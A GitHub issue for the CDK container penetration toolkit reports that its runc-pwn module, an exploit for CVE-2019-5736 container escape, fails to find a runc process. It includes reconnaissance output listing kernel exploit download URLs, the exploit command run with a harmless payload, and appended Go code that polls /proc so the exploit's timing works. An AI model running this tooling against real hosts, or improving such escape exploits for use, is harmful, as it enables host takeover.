Status: Open
Labels: bug
Description
Problem description
Running the runc-pwn module reports `cannot find RunC process inside container, exit.`
It then exits immediately; nothing happens and it just prints Finished.
The if check on line 87 returns straight out of the function, so the target container has already stopped watching for the pid before the host gets a chance to run the exec command. When the host first created the container, runc exited as soon as it finished, so runc's pid cannot be obtained.
CDK/pkg/exploit/docker_runc.go
Lines 87 to 90 in b0ca845
```go
if found == -1 {
	fmt.Println("\tcannot find RunC process inside container, exit.")
	return
}
```
Additional Information
1. Output of `cdk evaluate --full`
$ ./cdk evaluate --full
CDK (Container DucK)
CDK Version(GitCommit):
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/
[ Information Gathering - System Info ]
2023/03/12 02:16:25 current dir: /
2023/03/12 02:16:25 current user: root uid: 0 gid: 0 home: /root
2023/03/12 02:16:25 hostname: 807f6b85cc1e
2023/03/12 02:16:25 debian ubuntu 18.04 kernel: 4.4.0-210-generic
2023/03/12 02:16:25 Setuid files found:
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/bin/mount
/bin/su
/bin/umount
[ Information Gathering - Services ]
[ Information Gathering - Commands and Capabilities ]
2023/03/12 02:16:25 available commands:
find,ps,apt,dpkg,mount,fdisk,base64,perl
2023/03/12 02:16:25 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
CapInh: 00000000a80425fb
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
Cap decode: 0x00000000a80425fb = CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_MKNOD,CAP_AUDIT_WRITE,CAP_SETFCAP
[*] Maybe you can exploit the Capabilities below:
[ Information Gathering - Mounts ]
0:41 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/YCLLF3QMOQWI6RXE5WOEML3MWH:/var/lib/docker/overlay2/l/T75S3NZRBNEIAZ6L3SOODUELSG:/var/lib/docker/overlay2/l/TQUPTPF5JE77BTN7SPW3C4EZ2C:/var/lib/docker/overlay2/l/HXM2EF5BE7N4OJVLYPMFSUAT2X,upperdir=/var/lib/docker/overlay2/c1946e06500cb5afce2ebe698b81e2996dbb67c3b38e23fa225aeb8e3a457cf7/diff,workdir=/var/lib/docker/overlay2/c1946e06500cb5afce2ebe698b81e2996dbb67c3b38e23fa225aeb8e3a457cf7/work
0:44 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:45 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:46 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:47 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:48 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - tmpfs tmpfs rw,mode=755
0:23 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/systemd ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd
0:25 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/freezer ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,freezer
0:26 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/devices ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,devices
0:27 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/blkio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,blkio
0:28 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/net_cls,net_prio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,net_cls,net_prio
0:29 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/cpu,cpuacct ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpu,cpuacct
0:30 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/hugetlb ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,hugetlb
0:31 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/perf_event ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,perf_event
0:32 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/cpuset ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuset
0:33 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/memory ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory
0:34 /system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope /sys/fs/cgroup/pids ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,pids
0:43 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
253:1 /var/lib/docker/containers/807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/vda1 rw,data=ordered
253:1 /var/lib/docker/containers/807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83/hostname /etc/hostname rw,relatime - ext4 /dev/vda1 rw,data=ordered
253:1 /var/lib/docker/containers/807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83/hosts /etc/hosts rw,relatime - ext4 /dev/vda1 rw,data=ordered
0:42 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k
0:46 /0 /dev/console rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:44 /bus /proc/bus ro,relatime - proc proc rw
0:44 /fs /proc/fs ro,relatime - proc proc rw
0:44 /irq /proc/irq ro,relatime - proc proc rw
0:44 /sys /proc/sys ro,relatime - proc proc rw
0:44 /sysrq-trigger /proc/sysrq-trigger ro,relatime - proc proc rw
0:45 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:45 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:45 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:45 /null /proc/sched_debug rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:49 / /proc/scsi ro,relatime - tmpfs tmpfs ro
0:50 / /sys/firmware ro,relatime - tmpfs tmpfs ro
[ Information Gathering - Net Namespace ]
container net namespace isolated.
[ Information Gathering - Sysctl Variables ]
2023/03/12 02:16:25 net.ipv4.conf.all.route_localnet = 0
[ Information Gathering - DNS-Based Service Discovery ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 223.5.5.5:53: no such host
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 223.5.5.5:53: no such host
[ Discovery - K8s API Server ]
2023/03/12 02:16:25 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
api-server forbids anonymous request.
response:
[ Discovery - K8s Service Account ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
[ Discovery - Cloud Provider Metadata API ]
2023/03/12 02:16:25 failed to dial Alibaba Cloud API.
2023/03/12 02:16:26 failed to dial Azure API.
2023/03/12 02:16:26 failed to dial Google Cloud API.
2023/03/12 02:16:26 failed to dial Tencent Cloud API.
OpenStack Metadata API available in http://169.254.169.254/openstack/latest/meta_data.json
Docs: https://docs.openstack.org/nova/rocky/user/metadata-service.html
Amazon Web Services (AWS) Metadata API available in http://169.254.169.254/latest/meta-data/
Docs: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html
2023/03/12 02:16:27 failed to dial ucloud API.
[ Exploit Pre - Kernel Exploits ]
2023/03/12 02:16:27 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2021-27365] linux-iscsi
Details: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
Exposure: less probable
Tags: RHEL=8
Download URL: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-15666] XFRM_UAF
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
Exposure: less probable
Download URL:
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2017-7308] af_packet
Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
Exposure: less probable
Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000253] PIE_stack_corruption
Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
Exposure: less probable
Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
[+] [CVE-2017-1000112] NETIF_F_UFO
Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
Exposure: less probable
Tags: ubuntu=14.04{kernel:4.4.0-*},ubuntu=16.04{kernel:4.8.0-*}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE
Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
Exposure: less probable
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only
[+] [CVE-2016-8655] chocobo_root
Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
Download URL: https://www.exploit-db.com/download/40871
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
[+] [CVE-2016-4997] target_offset
Details: https://www.exploit-db.com/exploits/40049/
Exposure: less probable
Tags: ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40053.zip
Comments: ip_tables.ko needs to be loaded
[+] [CVE-2016-4557] double-fdput()
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Exposure: less probable
Tags: ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-2384] usb-midi
Details: https://xairy.github.io/blog/2016/cve-2016-2384
Exposure: less probable
Tags: ubuntu=14.04,fedora=22
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2016-0728] keyring
Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/40003
Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
[ Information Gathering - Sensitive Files ]
.dockerenv - /.dockerenv
/.bashrc - /etc/skel/.bashrc
/.bashrc - /root/.bashrc
[ Information Gathering - ASLR ]
2023/03/12 02:16:29 /proc/sys/kernel/randomize_va_space file content: 2
2023/03/12 02:16:29 ASLR is enabled.
[ Information Gathering - Cgroups ]
2023/03/12 02:16:29 /proc/1/cgroup file content:
11:pids:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
10:memory:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
9:cpuset:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
8:perf_event:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
7:hugetlb:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
6:cpu,cpuacct:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
5:net_cls,net_prio:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
4:blkio:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
3:devices:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
2:freezer:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
1:name=systemd:/system.slice/docker-807f6b85cc1e15c36d15620ad2411827fa238047f7eb916318cede3be20c2f83.scope
2023/03/12 02:16:29 /proc/self/cgroup file added content (compare pid 1) :
2. Full error output
root@807f6b85cc1e:/# ./cdk run runc-pwn "echo 'hello,host' > /tmp/haha.escape"
2023/03/12 02:15:28 THIS EXPLOIT WILL OVERWRITE RUNC BINARY AND BREAK CI/CD, BACKUP YOUR RUNC BINARY FIRST!
2023/03/12 02:15:28 Shellcode will be trigger when an execve() call in container or the container is manually stopped.
2023/03/12 02:15:28 Exploit CVE-2019-5736 with shellcode commands: echo 'hello,host' > /tmp/haha.escape
[0xc0001ccb60 0xc0001ccc30 0xc0001c81a0 0xc0001c9ba0 0xc00008dc70 0xc0001c8f70 0xc0001c9040 0xc0001c9790 0xc0001c9110 0xc0001c8a90 0xc0001c91e0 0xc0001c9c70 0xc00008dd40 0xc0001c8b60 0xc0001cc340 0xc00008dad0 0xc0001cc410 0xc00008dba0 0xc0001c9ee0 0xc0001c8750 0xc0001c92b0 0xc00008de10 0xc0001c9860 0xc0001c8820 0xc0001c9d40 0xc0001c8270 0xc0001c8340 0xc0001cc4e0 0xc0001cc000 0xc0001cc0d0 0xc0001c9380 0xc0001c88f0 0xc0001c8c30 0xc0001c9450 0xc0001c8410 0xc0001c9520 0xc0001c8d00 0xc0001c84e0 0xc00008dee0 0xc0001cc750 0xc0001cc1a0 0xc0001cc5b0 0xc0001c9e10 0xc0001c85b0 0xc0001cc9c0 0xc0001c9930 0xc0001c9a00 0xc0001c8680 0xc0001c89c0 0xc0001c8000 0xc0001cc820 0xc0001c95f0 0xc0001cca90 0xc0001cc270 0xc0001c80d0 0xc0001c8dd0 0xc0001c96c0 0xc0001cc8f0 0xc0001cc680 0xc0001c8ea0 0xc0001c9ad0]
/bin/bash
./cdkrunrunc-pwnecho 'hello,host' > /tmp/haha.escape
cannot find RunC process inside container, exit.
2023/03/12 02:15:28 Finished.
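The report above boils down to a timing problem: a single scan of the process list at exploit start finds no runc, because runc only lives inside the container's pid namespace for the short window of a `docker exec` (or container stop). The following is an added example, written for this page and not CDK's own code, of a poll-and-retry process search that waits for that window instead of returning on the first miss. It assumes the runc process can be recognised by the basename of its `/proc/<pid>/exe` link; to run offline it scans a constructed fake `/proc` tree rather than the real one, and the function names, the `runc` basename and the pid 4242 are illustrative.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strconv"
	"strings"
	"time"
)

// findProcessByExe scans procRoot (normally "/proc") for a process whose
// executable, as reported by the /proc/<pid>/exe symlink, has basename exeName.
// It returns that process's pid, or -1 when no such process is present.
func findProcessByExe(procRoot, exeName string) int {
	entries, err := os.ReadDir(procRoot)
	if err != nil {
		return -1
	}
	for _, e := range entries {
		// Only numeric directory names are processes; skip /proc/self, /proc/sys, ...
		pid, err := strconv.Atoi(e.Name())
		if err != nil || !e.IsDir() {
			continue
		}
		exe, err := os.Readlink(filepath.Join(procRoot, e.Name(), "exe"))
		if err != nil {
			// Kernel threads have no exe, the process may have exited between
			// ReadDir and Readlink, or the link is not readable from here.
			continue
		}
		// The kernel appends " (deleted)" when the binary was unlinked or replaced.
		exe = strings.TrimSuffix(exe, " (deleted)")
		if filepath.Base(exe) == exeName {
			return pid
		}
	}
	return -1
}

// waitForProcess polls findProcessByExe every interval until a matching
// process appears or timeout elapses. It returns the pid, or -1 on timeout.
func waitForProcess(procRoot, exeName string, timeout, interval time.Duration) int {
	deadline := time.Now().Add(timeout)
	for {
		if pid := findProcessByExe(procRoot, exeName); pid != -1 {
			return pid
		}
		if time.Now().After(deadline) {
			return -1
		}
		time.Sleep(interval)
	}
}

// makeFakeProc builds a constructed stand-in for /proc under root: one
// directory per pid with an "exe" symlink pointing at the given path.
// It exists only so the example runs offline without a real container.
func makeFakeProc(root string, procs map[int]string) error {
	for pid, exe := range procs {
		dir := filepath.Join(root, strconv.Itoa(pid))
		if err := os.MkdirAll(dir, 0o755); err != nil {
			return err
		}
		if err := os.Symlink(exe, filepath.Join(dir, "exe")); err != nil {
			return err
		}
	}
	return nil
}

func main() {
	root, err := os.MkdirTemp("", "fakeproc")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(root)

	// Constructed sample: only the container's own shell exists at first,
	// which is the situation the issue describes.
	if err := makeFakeProc(root, map[int]string{1: "/bin/bash"}); err != nil {
		panic(err)
	}
	fmt.Println("single scan:", findProcessByExe(root, "runc")) // -1, nothing to find yet

	// Simulate a later `docker exec`: a runc process shows up after a short delay.
	go func() {
		time.Sleep(200 * time.Millisecond)
		_ = makeFakeProc(root, map[int]string{4242: "/usr/bin/runc"})
	}()
	fmt.Println("polling scan:", waitForProcess(root, "runc", 5*time.Second, 20*time.Millisecond)) // 4242
}
```

Point `procRoot` at the real `/proc` and the same two functions apply unchanged; the timeout bounds how long the module waits for someone on the host to exec into the container, and a short interval keeps the scan from missing a runc process that is only alive for a few milliseconds.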